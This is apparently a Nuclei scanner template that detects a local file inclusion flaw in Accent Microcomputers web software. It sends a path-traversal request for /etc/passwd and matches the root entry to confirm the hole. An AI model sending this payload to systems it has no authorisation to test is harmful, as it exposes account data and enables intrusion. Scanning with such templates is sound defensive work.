id: accent-microcomputers-lfi

info:
  name: Accent Microcomputers LFI
  author: 0x_Akoko
  severity: high
  description: A local file inclusion vulnerability in Accent Microcomputers offerings could allow remote attackers to retrieve password files.
  reference:
    - https://cxsecurity.com/issue/WLB-2018050036
    - http://www.accent.com.pl
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: microcomputers,accent,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?id=50&file=../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4b0a004830460221009db314c9aaf9b7f5f4b9e7dec3f4dbff890f254721aeab2812151f9addc5c390022100d604bc98f131d61fb335e578e8130129487ffd4f2c2b1a380c20c1b94090c396:922c64590222798bb761d5b6d8e72950
